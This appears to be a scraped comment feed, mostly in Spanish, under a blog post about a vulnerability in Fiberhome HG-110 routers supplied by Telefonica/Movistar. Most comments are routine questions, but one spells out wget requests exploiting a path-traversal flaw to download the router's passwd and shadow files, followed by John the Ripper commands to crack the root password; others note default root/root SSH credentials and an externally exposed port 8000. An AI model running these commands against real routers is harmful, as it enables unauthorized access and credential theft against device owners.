Quantcast
Channel: Comentarios en: Vulnerabilidad en todos los routers Fiberhome HG-110 de Telefonica/Movistar
Viewing all 17 articles
Browse latest View live

Por: club penguin cheats


Por: infernal

$
0
0

como se llaman los cables que parecen coaxial de las antenas
y como es su configuración del hadware

Por: Zerial

Por: r4c3

$
0
0

muy interesante informacion y hay mas router que tienen pifias pero estas pifias surgen donde el firmware es modificado por movistar chile para dejarnos las conexiones como las weas xD

Por: leonciokof

$
0
0

¿Como accedo via ssh?, ¿con que usuario y contraseña?, ¿son las mismas cuentas del acceso web?
Yo tengo acceso via web al router, me gustaría saber como lo hago para la conexión ssh.
Gracias.

Por: Zerial

$
0
0

Hola leonciokof: En mi caso el acceso ssh era usando las mismas credenciales que via web (la de admin)

Por: Claudio

Por: Claudio

$
0
0

Encontré además que se puede acceder al puerto 8000 desde afuera :S, hay que hacer forward también a ese puerto.


Por: AT-HE (atesin)

$
0
0

para obtener la contraseña de root podrian usar la misma vulnerabilidad encontrada por zerial para luego crackearlas con john the ripper como dijeron mas arriba desde otra maquina (offline cracking)

# obtienen el archivo passwd y el archivo shadow

wget “http://192.168.1.1:8000/cgi-bin
/webproc?getpage=../../../../../../../../../../../../etc/passwd&
var:menu=advanced&var:page=dns”
wget “http://192.168.1.1:8000/cgi-bin
/webproc?getpage=../../../../../../../../../../../../etc/shadow&
var:menu=advanced&var:page=dns”

# instalan el john the ripper, luego “juntan” los dos archivos

unshadow passwd shadow > fiberhome.pwd

# luego tratan de crackear este nuevo archivo por fuerza bruta, les recomiendo hacerlo en alguna maquina potente si tienen acceso

john -incremental:lanman fiberhome.pwd

Por: Joao Paulo

$
0
0

Someone could decrypt the root password?

Por: Zerial

$
0
0

hi Joao Paulo:

You can use a brute-force script to crack the shadow. Is not the same password at all.

cheers

Por: Vulnerabilidades en FiberHome HG110 e implicancias para Movistar | SPECT Research

$
0
0

[...] , en abril de 2011, difundió vulnerabilidades del tipo Local File Include y Cross Site Scripting en el router [...]

Por: Ivan

$
0
0

Hoy iba caminando y me encontre ese mismo router botado en la calle xd y taba bueno… xd

Por: jonathan

$
0
0

hola disculpen , alguno sabe cual es la contraseña admin del modem router?
saludos

Por: Digital_freeak


Por: dante

$
0
0

hola! Alguien sabe como cambiar el password del servicio SSH? para que no sea root root. Necesito el acceso SSH pero es bastante vulnerable. Ademas existe alguna forma de reiniciar el equipo usando SSH?. gracias.

Por: Andrés

$
0
0

Este router tiene alguna vulnerabilidad si lo uso solo como repetidor de wifi?

Viewing all 17 articles
Browse latest View live